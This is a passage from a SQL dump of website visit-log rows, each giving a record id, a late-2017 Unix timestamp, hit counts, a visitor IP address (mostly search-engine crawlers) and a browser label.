,0,0,'54.36.148.176','other'),(189574,1514017299,1,1,0,0,'207.46.13.12','other'),(189575,1514017451,1,1,0,0,'217.69.133.239','other'),(189576,1514017568,1,1,0,0,'217.69.133.23','other'),(189577,1514017673,1,1,0,0,'54.36.149.71','other'),(189578,1514017693,1,1,0,0,'8.29.198.27','other'),(189579,1514017964,1,1,0,0,'54.36.149.43','other'),(189580,1514017994,1,1,0,0,'54.36.149.49','other'),(189581,1514018038,1,1,0,0,'54.36.148.81','other'),(189582,1514018399,1,1,0,0,'54.36.148.14','other'),(189583,1514018515,1,0,1,0,'66.249.64.30',''),(189584,1514018815,2,2,0,0,'54.36.148.151','other'),(189585,1514019146,1,1,0,0,'54.36.148.245','other'),(189586,1514019166,1,1,0,0,'217.69.133.239','other'),(189587,1514019284,1,1,0,0,'54.36.148.175','other'),(189588,1514019327,1,1,0,0,'51.255.71.121','other'),(189589,1514019484,1,1,0,0,'77.52.51.209','chrome'),(189590,1514019499,1,1,0,0,'37.73.237.47','chrome'),(189591,1514019669,1,1,0,0,'54.36.148.248','other'),(189592,1514019902,1,1,0,0,'217.69.133.241','other'),(189593,1514019903,2,2,0,0,'184.15.34.252','other'),(189594,1514020067,1,1,0,0,'54.36.148.103','other'),(189595,1514020118,1,1,0,0,'54.36.148.67','other'),(189596,1514020215,1,1,0,0,'54.36.148.93','other'),(189597,1514020226,1,1,0,0,'54.36.148.70','other'),(189598,1514020272,1,1,0,0,'54.36.148.187','other'),(189599,1514020826,1,1,0,0,'54.36.148.112','other'),(189600,1514020894,2,2,0,0,'54.165.59.7','other'),(189601,1514021232,1,1,0,0,'54.36.148.124','other'),(189602,1514021320,1,1,0,0,'54.36.149.30','other'),(189603,1514021658,1,1,0,0,'54.36.149.105','other'),(189604,1514022098,1,1,0,0,'54.36.149.11','other'),(189605,1514022401,1,1,0,0,'51.255.71.132','other'),(189606,1514022779,1,1,0,0,'217.69.133.234','other'),(189607,1514023074,1,1,0,0,'54.36.148.87','other'),(189608,1514023151,1,1,0,0,'54.36.148.103','other'),(189609,1514023407,1,1,0,0,'54.36.148.68','other'),(189610,1514023429,1,1,0,0,'51.255.71.127','other'),(189611,1514023547,1,1,0,0,'54.36.149.56','other'),(189612,1514023576,1,1,0,0,'91.196.178.33','chrome'),(189613,1514023683,1,1,0,0,'54.36.148.51','other'),(189614,1514023852,1,1,0,0,'54.36.149.15','other'),(189615,1514023890,1,1,0,0,'54.36.148.150','other'),(189616,1514023940,1,1,0,0,'54.36.148.239','other'),(189617,1514024576,1,1,0,0,'54.36.148.190','other'),(189618,1514024830,1,1,0,0,'54.36.148.249','other'),(189619,1514024911,1,1,0,0,'54.36.149.17','other'),(189620,1514024997,1,1,0,0,'54.36.148.246','other'),(189621,1514025065,1,1,0,0,'51.255.71.117','other'),(189622,1514025264,1,1,0,0,'54.36.149.74','other'),(189623,1514025818,1,1,0,0,'54.36.149.26','other'),(189624,1514025923,1,1,0,0,'54.36.148.79','other'),(189625,1514026021,1,1,0,0,'141.8.142.74','other'),(189626,1514026133,1,1,0,0,'54.36.149.44','other'),(189627,1514026317,1,1,0,0,'178.92.74.238','chrome'),(189628,1514026501,1,1,0,0,'54.36.148.195','other'),(189629,1514026507,1,1,0,0,'54.36.149.27','other'),(189630,1514026623,1,1,0,0,'54.36.148.23','other'),(189631,1514027030,1,1,0,0,'157.55.39.101','other'),(189632,1514027142,1,1,0,0,'54.36.148.42','other'),(189633,1514027234,1,1,0,0,'51.255.71.119','other'),(189634,1514027496,1,1,0,0,'217.69.133.59','other'),(189635,1514027758,1,1,0,0,'54.36.148.33','other'),(189636,1514027875,1,1,0,0,'54.36.149.51','other'),(189637,1514027910,1,1,0,0,'54.36.148.129','other'),(189638,1514027955,1,1,0,0,'54.36.149.5','other'),(189639,1514028047,1,1,0,0,'54.36.148.100','other'),(189640,1514028147,1,1,0,0,'54.36.148.41','other'),(189641,1514028441,1,1,0,0,'51.255.71.123','other'),(189642,1514028448,1,1,0,0,'54.36.149.99','other'),(189643,1514028525,1,1,0,0,'8.29.198.26','other'),(189644,1514028845,1,1,0,0,'217.69.133.190','other'),(189645,1514028948,1,1,0,0,'54.36.149.28','other'),(189646,1514028992,1,1,0,0,'54.36.148.208','other'),(189647,1514029354,1,1,0,0,'54.36.149.62','other'),(189648,1514029362,1,1,0,0,'157.55.39.101','other'),(189649,1514030007,1,1,0,0,'54.36.149.42','other'),(189650,1514030464,1,1,0,0,'54.36.148.43','other'),(189651,1514030620,1,1,0,0,'54.36.149.104','other'),(189652,1514030642,1,1,0,0,'54.36.149.15','other'),(189653,1514030698,1,1,0,0,'95.46.157.2','chrome'),(189654,1514030864,1,1,0,0,'207.46.13.12','other'),(189655,1514030920,1,1,0,0,'54.36.148.133','other'),(189656,1514030970,1,1,0,0,'54.36.148.185','other'),(189657,1514031140,1,1,0,0,'51.255.71.121','other'),(189658,1514031623,1,1,0,0,'54.36.148.118','other'),(189659,1514032236,1,1,0,0,'54.36.148.90','other'),(189660,1514032279,1,1,0,0,'54.36.148.137','other'),(189661,1514032490,1,1,0,0,'54.36.149.79','other'),(189662,1514032658,1,1,0,0,'54.36.148.242','other'),(189663,1514032714,1,1,0,0,'176.193.126.21','msie'),(189664,1514032820,1,1,0,0,'217.69.133.23','other'),(189665,1514032963,1,1,0,0,'54.36.148.103','other'),(189666,1514033246,1,1,0,0,'54.36.148.248','other'),(189667,1514033444,2,2,0,0,'54.36.148.246','other'),(189668,1514033482,1,1,0,0,'54.36.148.237','other'),(189669,1514033553,1,1,0,0,'217.69.133.228','other'),(189670,1514034023,1,1,0,0,'54.36.149.69','other'),(189671,1514034082,1,1,0,0,'178.92.74.238','chrome'),(189672,1514034138,1,1,0,0,'54.36.148.161','other'),(189673,1514034640,1,1,0,0,'54.36.148.235','other'),(189674,1514034669,1,1,0,0,'54.36.148.118','other'),(189675,1514034955,1,1,0,0,'54.36.148.97','other'),(189676,1514035119,1,1,0,0,'54.36.148.174','other'),(189677,1514035671,1,1,0,0,'37.73.205.163','chrome'),(189678,1514035832,1,1,0,0,'54.36.148.23','other'),(189679,1514036219,1,1,0,0,'66.249.64.28','chrome'),(189680,1514036293,1,1,0,0,'54.36.148.187','other'),(189681,1514036327,1,1,0,0,'54.36.148.135','other'),(189682,1514036536,1,0,1,0,'66.249.64.29',''),(189683,1514036951,1,1,0,0,'54.36.148.247','other'),(189684,1514037017,1,1,0,0,'54.36.149.3','other'),(189685,1514037127,1,1,0,0,'54.36.148.208','other'),(189686,1514037173,1,1,0,0,'51.255.71.131','other'),(189687,1514037230,1,1,0,0,'54.36.148.127','other'),(189688,1514037683,1,1,0,0,'162.210.196.130','other'),(189689,1514037706,1,1,0,0,'54.36.148.255','other'),(189690,1514037780,1,1,0,0,'54.36.149.9','other'),(189691,1514037841,1,1,0,0,'54.36.148.170','other'),(189692,1514038011,1,1,0,0,'66.249.64.29','chrome'),(189693,1514038055,1,1,0,0,'54.36.148.165','other'),(189694,1514038379,1,1,0,0,'217.69.133.23','other'),(189695,1514038978,1,1,0,0,'178.92.74.238','chrome'),(189696,1514039219,1,1,0,0,'178.95.160.120','opera'),(189697,1514039358,1,1,0,0,'8.29.198.25','other'),(189698,1514040694,1,1,0,0,'217.69.133.236','other'),(189699,1514041290,1,1,0,0,'157.55.39.203','other'),(189700,1514044003,1,1,0,0,'157.55.39.203','other'),(189701,1514044158,1,1,0,0,'91.196.178.71','chrome'),(189702,1514045113,1,1,0,0,'178.92.138.22','firefox'),(189703,1514046013,2,0,2,0,'66.249.64.29',''),(189704,1514046052,2,0,2,0,'66.249.64.28',''),(189705,1514046126,1,0,1,0,'66.249.64.30',''),(189706,1514046731,1,1,0,0,'217.69.133.239','other'),(189707,1514046742,1,1,0,0,'46.211.100.136','chrome'),(189708,1514047156,1,1,0,0,'157.55.39.130','other'),(189709,1514047935,2,2,0,0,'91.196.178.37','chrome'),(189711,1514047953,1,0,1,0,'66.249.64.28',''),(189712,1514048326,1,1,0,0,'157.55.39.101','other'),(189713,1514049246,1,1,0,0,'157.55.39.130','other'),(189714,1514049726,1,0,1,0,'66.249.64.28',''),(189715,1514049781,4,4,0,0,'66.249.64.29','chrome'),(189716,1514050005,1,1,0,0,'66.249.64.28','chrome'),(189717,1514050189,1,1,0,0,'8.29.198.25','other'),(189718,1514050786,1,1,0,0,'91.196.178.67','firefox'),(189719,1514051441,1,1,0,0,'66.249.64.30','chrome'),(189720,1514051567,3,3,0,0,'66.249.64.28','chrome'),(189721,1514051575,1,1,0,0,'66.249.64.29','chrome'),(189722,1514052536,1,1,0,0,'157.55.39.203','other'),(189723,1514053699,1,1,0,0,'66.249.64.29','chrome'),(189724,1514054298,1,1,0,0,'66.249.64.30','chrome'),(189725,1514054405,1,1,0,0,'157.55.39.101','other'),(189726,1514054770,1,1,0,0,'95.108.244.57','chrome'),(189727,1514054937,1,1,0,0,'157.55.39.203','other'),(189728,1514054956,1,1,0,0,'134.249.33.158','chrome'),(189729,1514055017,1,1,0,0,'54.36.149.40','other'),(189730,1514055060,1,1,0,0,'178.92.74.238','chrome'),(189731,1514055085,1,1,0,0,'91.196.178.163','chrome'),(189732,1514055527,1,0,1,0,'66.249.64.30',''),(189733,1514055568,1,1,0,0,'54.36.148.180','other'),(189734,1514055873,1,1,0,0,'54.36.148.162','other'),(189735,1514056065,1,1,0,0,'95.132.1.28','chrome'),(189736,1514056420,1,1,0,0,'54.36.148.10','other'),(189737,1514057000,1,0,1,0,'66.249.64.30',''),(189738,1514057341,2,2,0,0,'207.46.13.12','other'),(189739,1514057507,1,1,0,0,'217.69.133.193','other'),(189740,1514057605,1,1,0,0,'54.36.149.57','other'),(189741,1514057957,1,1,0,0,'54.36.148.153','other'),(189742,1514058545,1,1,0,0,'54.36.148.157','other'),(189743,1514058587,1,1,0,0,'54.36.149.28','other'),(189744,1514058635,1,1,0,0,'37.73.206.114','other'),(189745,1514058639,1,1,0,0,'54.36.148.71','other'),(189746,1514058696,1,1,0,0,'54.36.149.101','other'),(189747,1514058707,1,1,0,0,'54.36.148.118','other'),(189748,1514058728,1,1,0,0,'54.36.148.136','other'),(189749,1514058735,1,0,1,0,'66.249.64.28',''),(189750,1514059052,1,1,0,0,'66.249.64.29','chrome'),(189751,1514059102,1,1,0,0,'54.36.148.126','other'),(189752,1514059152,1,1,0,0,'54.36.148.22','other'),(189753,1514059282,1,0,1,0,'66.249.64.30',''),(189754,1514059514,1,1,0,0,'176.120.105.121','chrome'),(189755,1514059693,1,0,1,0,'66.249.66.80',''),(189756,1514060227,1,1,0,0,'54.36.148.104','other'),(189757,1514060500,1,1,0,0,'54.36.148.41','other'),(189758,1514060643,1,1,0,0,'54.36.149.91','other'),(189759,1514061016,1,1,0,0,'8.29.198.25','other'),(189760,1514061210,1,1,0,0,'54.36.148.159','other'),(189761,1514061264,1,1,0,0,'54.36.148.132','other'),(189762,1514061722,1,1,0,0,'217.69.133.11','other'),(189763,1514061875,1,1,0,0,'54.36.149.75','other'),(189764,1514061903,1,1,0,0,'54.36.148.160','other'),(189765,1514062039,1,1,0,0,'54.36.148.169','other'),(189766,1514062060,1,1,0,0,'54.36.148.50','other'),(189767,1514062298,1,0,1,0,'66.249.66.155',''),(189768,1514062373,1,1,0,0,'66.249.66.155','chrome'),(189769,1514062410,2,1,1,0,'66.249.66.156',''),(189770,1514062622,1,1,0,0,'54.36.149.43','other'),(189771,1514062695,1,1,0,0,'82.145.222.70','chrome'),(189772,1514062868,1,1,0,0,'54.36.148.21','other'),(189773,1514062988,1,1,0,0,'54.36.148.203','other'),(189774,1514062994,1,1,0,0,'5.9.88.103','other'),(189775,1514063127,1,1,0,0,'54.36.148.27','other'),(189776,1514063276,1,1,0,0,'217.69.133.10','other'),(189777,1514063657,1,1,0,0,'54.36.149.93','other'),(189778,1514063674,1,1,0,0,'54.36.148.116','other'),(189779,1514063728,1,1,0,0,'82.145.220.196','other'),(189781,1514063806,1,1,0,0,'54.36.148.60','other'),(189782,1514064019,1,1,0,0,'107.167.107.130','chrome'),(189783,1514064031,1,1,0,0,'107.167.107.130','opera'),(189784,1514064033,1,0,1,0,'66.249.66.156',''),(189785,1514064117,1,1,0,0,'51.255.71.122','other'),(189786,1514064163,1,1,0,0,'54.36.148.166','other'),(189787,1514064178,1,1,0,0,'54.36.148.78','other'),(189788,1514064364,1,1,0,0,'54.36.149.10','other'),(189789,1514064374,1,1,0,0,'51.255.71.120','other'),(189790,1514064472,1,1,0,0,'54.36.149.5','other'),(189791,1514064649,1,1,0,0,'66.249.66.155','chrome'),(189792,1514064656,1,1,0,0,'54.36.148.128','other'),(189793,1514064770,1,1,0,0,'54.36.148.236','other'),(189794,1514064838,1,1,0,0,'54.36.148.95','other'),(189795,1514064958,1,1,0,0,'54.36.148.180','other'),(189796,1514065675,1,1,0,0,'54.36.148.70','other'),(189797,1514065899,1,1,0,0,'157.55.39.101','other'),(189798,1514066008,1,1,0,0,'54.36.148.204','other'),(189799,1514066019,1,1,0,0,'54.36.148.23','other'),(189800,1514066080,1,1,0,0,'54.36.148.43','other'),(189801,1514066643,1,1,0,0,'54.36.148.141','other'),(189802,1514066671,1,1,0,0,'54.36.149.6','other'),(189803,1514067206,1,1,0,0,'54.36.148.46','other'),(189804,1514067511,1,1,0,0,'54.36.148.242','other'),(189805,1514068022,1,1,0,0,'51.255.71.120','other'),(189806,1514068651,1,1,0,0,'54.36.148.30','other'),(189807,1514069022,1,1,0,0,'54.36.149.94','other'),(189808,1514069139,1,1,0,0,'54.36.148.244','other'),(189809,1514069680,1,1,0,0,'54.36.149.103','other'),(189810,1514070001,2,2,0,0,'207.46.13.12','other'),(189811,1514070055,1,1,0,0,'51.255.71.131','other'),(189812,1514070071,1,1,0,0,'54.36.148.109','other'),(189813,1514070120,1,1,0,0,'54.36.148.188','other'),(189814,1514070181,1,1,0,0,'54.36.148.80','other'),(189815,1514070644,1,1,0,0,'217.69.133.30','other'),(189816,1514070901,1,1,0,0,'180.76.15.139','other'),(189817,1514071168,1,1,0,0,'54.36.149.6','other'),(189818,1514071846,1,1,0,0,'8.29.198.26','other'),(189819,1514071856,1,1,0,0,'54.36.148.47','other'),(189820,1514071876,1,1,0,0,'54.36.148.56','other'),(189821,1514071982,1,1,0,0,'54.36.149.18','other'),(189822,1514072115,1,1,0,0,'54.36.148.14','other'),(189823,1514072904,1,1,0,0,'91.196.178.163','chrome'),(189824,1514073130,1,1,0,0,'54.36.149.97','other'),(189825,1514073393,1,1,0,0,'51.255.71.119','other'),(189826,1514073484,1,1,0,0,'54.36.148.205','other'),(189827,1514073830,1,1,0,0,'54.36.148.150','other'),(189828,1514074119,1,0,1,0,'66.249.66.156',''),(189829,1514074148,1,1,0,0,'54.36.148.33','other'),(189830,1514074197,1,1,0,0,'54.36.149.26','other'),(189831,1514074298,1,1,0,0,'54.36.148.55','other'),(189832,1514074408,1,1,0,0,'66.249.66.156','chrome'),(189833,1514074698,2,1,1,0,'66.249.66.157',''),(189834,1514075539,1,1,0,0,'54.36.149.35','other'),(189835,1514075927,1,1,0,0,'54.36.149.5','other'),(189836,1514075987,1,1,0,0,'54.36.148.111','other'),(189837,1514076186,1,1,0,0,'54.36.148.29','other'),(189838,1514076459,1,1,0,0,'54.36.148.143','other'),(189839,1514076468,1,1,0,0,'217.69.133.15','other'),(189840,1514076585,1,1,0,0,'207.46.13.12','other'),(189841,1514077223,2,2,0,0,'141.8.142.74','other'),(189842,1514077408,1,1,0,0,'54.36.149.16','other'),(189843,1514077916,1,1,0,0,'54.36.149.70','other'),(189844,1514078374,1,1,0,0,'54.36.148.242','other'),(189845,1514078457,1,1,0,0,'51.255.71.121','other'),(189846,1514078556,1,1,0,0,'87.250.224.46','other'),(189847,1514079405,1,1,0,0,'54.36.148.146','other'),(189848,1514079714,1,1,0,0,'157.55.39.101','other'),(189849,1514079789,1,1,0,0,'54.36.148.193','other'),(189850,1514080026,1,1,0,0,'54.36.149.40','other'),(189851,1514080060,1,1,0,0,'66.249.66.74','chrome'),(189852,1514080142,1,1,0,0,'54.36.148.50','other'),(189853,1514080233,1,1,0,0,'54.36.149.82','other'),(189854,1514080565,1,1,0,0,'54.36.149.24','other'),(189855,1514081043,1,1,0,0,'54.36.149.69','other'),(189856,1514081563,1,1,0,0,'195.238.108.91','chrome'),(189857,1514081942,1,1,0,0,'54.36.148.204','other'),(189858,1514082271,1,1,0,0,'54.36.148.115','other'),(189859,1514082394,1,1,0,0,'54.36.149.88','other'),(189860,1514082527,1,1,0,0,'54.36.148.200','other'),(189861,1514082634,1,1,0,0,'51.255.71.131','other'),(189862,1514082679,1,1,0,0,'8.29.198.25','other'),(189863,1514082775,1,1,0,0,'157.55.39.101','other'),(189864,1514083063,1,1,0,0,'141.8.142.74','other'),(189865,1514083181,1,1,0,0,'54.36.149.62','other'),(189866,1514083449,1,1,0,0,'54.36.149.46','other'),(189867,1514083458,1,1,0,0,'54.36.149.29','other'),(189868,1514083490,1,1,0,0,'54.36.148.137','other'),(189869,1514083640,1,1,0,0,'54.36.149.24','other'),(189870,1514083940,1,1,0,0,'54.36.148.27','other'),(189871,1514084419,1,1,0,0,'54.36.148.230','other'),(189872,1514084615,2,2,0,0,'69.30.205.218','other'),(189873,1514084906,1,1,0,0,'66.249.66.157','chrome'),(189874,1514085004,1,1,0,0,'54.36.148.72','other'),(189875,1514085346,1,1,0,0,'54.36.148.100','other'),(189876,1514085349,1,1,0,0,'54.36.148.230','other'),(189877,1514085689,1,1,0,0,'157.55.39.130','other'),(189878,1514086199,1,1,0,0,'54.36.148.198','other'),(189879,1514086656,1,1,0,0,'54.36.148.27','other'),(189880,1514086814,1,1,0,0,'176.105.212.251','firefox'),(189881,1514087518,1,1,0,0,'54.36.148.74','other'),(189882,1514087543,1,1,0,0,'54.36.148.157','other'),(189883,1514087622,1,1,0,0,'157.55.39.130','other'),(189884,1514087786,1,1,0,0,'54.36.148.174','other'),(189885,1514088384,2,2,0,0,'54.36.149.67','other'),(189886,1514088563,1,1,0,0,'54.36.149.10','other'),(189887,1514088872,1,1,0,0,'87.250.224.46','other'),(189888,1514088977,1,1,0,0,'54.36.148.110','other'),(189889,1514089013,1,1,0,0,'54.36.148.44','other'),(189890,1514089116,1,1,0,0,'54.36.148.38','other'),(189891,1514089282,1,1,0,0,'93.74.71.60','other'),(189892,1514089283,1,1,0,0,'37.9.113.182','other'),(189893,1514089369,1,1,0,0,'54.36.148.134','other'),(189894,1514089435,1,1,0,0,'54.36.148.67','other'),(189895,1514089854,1,1,0,0,'54.36.149.60','other'),(189896,1514090095,1,1,0,0,'157.55.39.130','other'),(189897,1514090410,1,1,0,0,'54.36.148.51','other'),(189898,1514090657,1,1,0,0,'54.36.149.1','other'),(189899,1514090677,1,1,0,0,'54.36.148.243','other'),(189900,1514090870,1,1,0,0,'54.36.148.28','other'),(189901,1514091000,1,0,1,0,'66.249.66.155',''),(189902,1514091017,1,1,0,0,'54.36.149.56','other'),(189903,1514091082,1,1,0,0,'51.255.71.115','other'),(189904,1514091402,1,1,0,0,'54.36.148.249','other'),(189905,1514091996,1,1,0,0,'54.36.148.36','other'),(189906,1514092032,1,1,0,0,'54.36.149.35','other'),(189907,1514093093,1,1,0,0,'54.36.148.202','other'),(189908,1514093198,1,1,0,0,'54.36.148.51','other'),(189909,1514093512,1,1,0,0,'8.29.198.27','other'),(189910,1514093658,1,1,0,0,'54.36.148.156','other'),(189911,1514093694,1,1,0,0,'54.36.148.186','other'),(189912,1514093928,1,1,0,0,'54.36.149.13','other'),(189913,1514094298,1,1,0,0,'217.69.133.193','other'),(189914,1514094412,1,1,0,0,'54.36.149.27','other'),(189915,1514095001,1,1,0,0,'51.255.71.123','other'),(189916,1514095004,1,1,0,0,'54.36.149.55','other'),(189917,1514095263,1,1,0,0,'91.196.178.67','chrome'),(189918,1514095507,1,1,0,0,'54.36.149.93','other'),(189919,1514096018,1,1,0,0,'54.36.149.65','other'),(189920,1514096138,1,1,0,0,'54.36.148.129','other'),(189921,1514096315,1,1,0,0,'51.255.71.121','other'),(189922,1514096365,1,1,0,0,'54.36.148.162','other'),(189923,1514096490,1,1,0,0,'54.36.149.88','other'),(189924,1514096647,1,1,0,0,'157.55.39.130','other'),(189925,1514096801,1,1,0,0,'54.36.148.141','other'),(189926,1514096850,1,1,0,0,'54.36.149.62','other'),(189927,1514097182,1,1,0,0,'54.36.148.163','other'),(189928,1514097290,1,1,0,0,'54.36.149.78','other'),(189929,1514097676,1,1,0,0,'54.36.148.164','other'),(189930,1514098011,1,1,0,0,'54.36.148.97','other'),(189931,1514098132,1,1,0,0,'54.36.148.246','other'),(189932,1514098286,1,1,0,0,'37.9.113.182','other'),(189933,1514098362,1,1,0,0,'54.36.149.43','other'),(189934,1514099588,1,1,0,0,'54.36.148.113','other'),(189935,1514100029,1,1,0,0,'54.36.149.29','other'),(189936,1514100127,1,1,0,0,'51.255.71.121','other'),(189937,1514100187,1,1,0,0,'178.154.171.88','other'),(189938,1514100634,1,1,0,0,'54.36.148.73','other'),(189939,1514100957,2,2,0,0,'54.36.148.60','other'),(189940,1514101278,1,1,0,0,'54.36.149.23','other'),(189941,1514101348,1,1,0,0,'54.36.148.57','other'),(189942,1514101371,1,1,0,0,'54.36.149.79','other'),(189943,1514101526,1,1,0,0,'217.69.133.11','other'),(189944,1514101737,1,1,0,0,'54.36.149.83','other'),(189945,1514101914,19,19,0,0,'173.212.201.251','other'),(189946,1514101974,1,1,0,0,'54.36.148.90','other'),(189947,1514102128,1,1,0,0,'54.36.149.41','other'),(189948,1514102287,1,1,0,0,'54.36.149.5','other'),(189949,1514102508,1,1,0,0,'54.36.148.67','other'),(189950,1514102771,1,1,0,0,'51.255.71.113','other'),(189951,1514102792,1,1,0,0,'54.36.148.207','other'),(189952,1514102989,1,1,0,0,'54.36.148.171','other'),(189953,1514103020,1,1,0,0,'51.255.71.116','other'),(189954,1514103107,1,1,0,0,'178.92.74.238','chrome'),(189955,1514103198,1,1,0,0,'54.36.149.11','other'),(189956,1514103384,1,1,0,0,'54.165.59.7','other'),(189957,1514103632,1,1,0,0,'207.46.13.12','other'),(189958,1514103715,1,1,0,0,'54.36.149.35','other'),(189959,1514104339,1,1,0,0,'8.29.198.26','other'),(189960,1514104355,1,1,0,0,'178.154.171.88','other'),(189961,1514104408,1,1,0,0,'54.36.148.127','other'),(189962,1514104545,1,1,0,0,'51.255.71.116','other'),(189963,1514105249,1,1,0,0,'54.36.148.86','other'),(189964,1514105466,1,1,0,0,'54.36.148.78','other'),(189965,1514105729,1,1,0,0,'54.36.148.121','other'),(189966,1514105741,1,1,0,0,'54.36.148.73','other'),(189967,1514106044,1,1,0,0,'54.36.148.119','other'),(189968,1514106300,1,1,0,0,'54.36.149.86','other'),(189969,1514106909,1,1,0,0,'54.36.149.74','other'),(189970,1514107903,1,1,0,0,'212.15.176.253','chrome'),(189971,1514108158,1,1,0,0,'54.36.148.171','other'),(189972,1514108266,1,1,0,0,'54.36.148.11','other'),(189973,1514108310,1,1,0,0,'54.36.149.42','other'),(189974,1514108407,1,1,0,0,'109.173.52.191','msie'),(189975,1514108447,1,1,0,0,'54.36.148.57','other'),(189976,1514108475,1,1,0,0,'54.36.148.149','other'),(189977,1514108523,1,1,0,0,'54.36.148.113','other'),(189978,1514108644,1,1,0,0,'37.9.113.182','other'),(189979,1514108740,1,0,1,0,'66.249.66.155',''),(189980,1514108758,1,1,0,0,'54.36.148.61','other'),(189981,1514108841,1,1,0,0,'54.36.148.51','other'),(189982,1514108953,1,1,0,0,'54.36.148.83','other'),(189983,1514109037,1,0,1,0,'66.249.66.157',''),(189984,1514109320,1,1,0,0,'54.36.149.16','other'),(189985,1514109543,3,3,0,0,'37.59.222.30','other'),(189986,1514109859,1,1,0,0,'54.36.148.193','other'),(189987,1514109875,1,1,0,0,'54.36.149.13','other'),(189988,1514110054,1,1,0,0,'141.8.142.74','other'),(189989,1514111555,1,1,0,0,'54.36.149.85','other'),(189990,1514111758,1,1,0,0,'54.36.148.178','other'),(189991,1514111760,1,1,0,0,'54.36.148.160','other'),(189992,1514111895,1,1,0,0,'54.36.148.65','other'),(189993,1514112480,1,1,0,0,'54.36.149.55','other'),(189994,1514112513,1,1,0,0,'217.69.133.222','other'),(189995,1514112546,1,1,0,0,'141.8.142.74','other'),(189996,1514113000,1,1,0,0,'178.154.171.88','other'),(189997,1514113135,1,1,0,0,'54.36.149.27','other'),(189998,1514113353,1,1,0,0,'54.36.148.106','other'),(189999,1514113463,1,1,0,0,'54.36.149.18','other'),(190000,1514113656,1,1,0,0,'54.36.148.24','other'),(190001,1514113720,1,1,0,0,'51.255.71.115','other'),(190002,1514114265,1,1,0,0,'54.36.148.53','other'),(190003,1514114410,1,1,0,0,'54.36.148.158','other'),(190004,1514114603,1,1,0,0,'54.36.149.21','other'),(190005,1514114753,1,1,0,0,'54.36.148.155','other'),(190006,1514114867,1,1,0,0,'157.55.39.203','other'),(190007,1514114939,1,1,0,0,'54.36.148.241','other'),(190008,1514115152,1,1,0,0,'54.36.149.92','other'),(190009,1514115168,1,1,0,0,'8.29.198.27','other'),(190010,1514115221,1,1,0,0,'54.36.148.73','other'),(190011,1514115803,1,1,0,0,'54.36.148.167','other'),(190012,1514116207,1,1,0,0,'54.36.148.136','other'),(190013,1514117148,1,1,0,0,'54.36.149.2','other'),(190014,1514117390,1,1,0,0,'51.255.71.130','other'),(190015,1514117459,1,1,0,0,'54.36.148.78','other'),(190016,1514117618,1,1,0,0,'54.36.148.30','other'),(190017,1514117712,1,0,1,0,'66.249.66.76',''),(190018,1514117810,1,1,0,0,'51.255.71.123','other'),(190019,1514118143,1,1,0,0,'54.36.148.73','other'),(190020,1514118173,1,1,0,0,'199.58.86.211','other'),(190021,1514118191,1,1,0,0,'91.196.178.36','chrome'),(190022,1514118521,1,1,0,0,'54.36.149.16','other'),(190023,1514118814,1,1,0,0,'91.196.178.134','chrome'),(190024,1514118816,1,1,0,0,'54.36.148.41','other'),(190025,1514118910,1,1,0,0,'54.36.149.91','other'),(190026,1514118960,1,1,0,0,'54.36.149.6','other'),(190027,1514119514,1,1,0,0,'54.36.148.152','other'),(190028,1514119575,1,1,0,0,'54.36.149.60','other'),(190029,1514119630,1,1,0,0,'54.36.148.18','other'),(190031,1514119820,1,1,0,0,'54.36.149.52','other'),(190032,1514119948,1,1,0,0,'54.36.148.169','other'),(190033,1514120058,1,1,0,0,'54.36.149.73','other'),(190034,1514120128,1,1,0,0,'54.36.148.125','other'),(190035,1514120394,1,1,0,0,'54.36.149.84','other'),(190036,1514120539,1,1,0,0,'54.36.148.85','other'),(190037,1514120663,1,1,0,0,'54.36.148.248','other'),(190038,1514120695,1,1,0,0,'51.255.71.127','other'),(190039,1514120967,1,1,0,0,'157.55.39.130','other'),(190040,1514121133,1,1,0,0,'54.36.148.53','other'),(190041,1514121583,1,0,1,0,'66.249.66.155',''),(190042,1514121628,1,1,0,0,'207.46.13.12','other'),(190043,1514122277,1,1,0,0,'51.255.71.122','other'),(190044,1514122555,1,1,0,0,'51.255.71.126','other'),(190045,1514122627,1,1,0,0,'54.36.148.85','other'),(190046,1514122759,1,1,0,0,'54.36.149.74','other'),(190047,1514122802,1,1,0,0,'54.36.148.158','other'),(190048,1514123005,1,1,0,0,'54.36.148.99','other'),(190049,1514123071,1,1,0,0,'54.36.148.172','other'),(190050,1514123567,1,1,0,0,'54.36.148.21','other'),(190051,1514123578,2,2,0,0,'178.154.171.88','other'),(190052,1514123794,1,1,0,0,'54.36.149.0','other'),(190053,1514123848,1,1,0,0,'87.250.224.46','other'),(190054,1514124276,1,1,0,0,'51.255.71.116','other'),(190055,1514124529,1,0,1,0,'66.249.66.75',''),(190056,1514125033,1,1,0,0,'54.36.148.190','other'),(190057,1514125077,1,1,0,0,'54.36.149.100','other'),(190058,1514125085,1,1,0,0,'54.36.149.5','other'),(190059,1514125542,1,1,0,0,'54.36.149.36','other'),(190060,1514125741,1,1,0,0,'54.36.148.172','other'),(190061,1514125822,1,1,0,0,'54.36.149.84','other'),(190062,1514125938,1,1,0,0,'37.9.113.115','other'),(190063,1514125942,1,1,0,0,'141.8.142.74','other'),(190064,1514126001,1,1,0,0,'8.29.198.26','other'),(190065,1514126114,1,1,0,0,'54.36.148.94','other'),(190066,1514126761,1,1,0,0,'95.221.135.218','msie'),(190067,1514126806,1,1,0,0,'178.92.74.238','chrome'),(190068,1514126951,1,1,0,0,'54.36.148.35','other'),(190069,1514127032,1,1,0,0,'54.36.149.14','other'),(190070,1514127095,1,1,0,0,'51.255.71.125','other'),(190071,1514127504,1,1,0,0,'54.36.148.124','other'),(190072,1514127556,1,1,0,0,'192.166.117.238','chrome'),(190073,1514127650,1,1,0,0,'37.9.113.182','other'),(190074,1514127736,1,1,0,0,'54.36.149.90','other'),(190075,1514127820,1,1,0,0,'178.154.171.88','other'),(190076,1514127965,1,1,0,0,'51.255.71.133','other'),(190077,1514128113,1,1,0,0,'157.55.39.203','other'),(190078,1514128125,1,1,0,0,'91.196.177.142','chrome'),(190079,1514128330,1,1,0,0,'51.255.71.126','other'),(190080,1514128406,1,0,1,0,'66.249.66.156',''),(190081,1514128419,1,1,0,0,'54.36.148.244','other'),(190082,1514128592,1,1,0,0,'54.36.149.76','other'),(190083,1514128888,1,1,0,0,'54.36.149.74','other'),(190084,1514129159,1,1,0,0,'54.36.149.105','other'),(190085,1514129230,1,1,0,0,'54.36.148.19','other'),(190086,1514129672,1,1,0,0,'54.36.148.202','other'),(190087,1514129954,1,1,0,0,'178.92.74.238','chrome'),(190088,1514130050,1,1,0,0,'54.36.148.101','other'),(190089,1514130238,1,1,0,0,'141.8.142.74','other'),(190090,1514130273,1,1,0,0,'54.36.149.63','other'),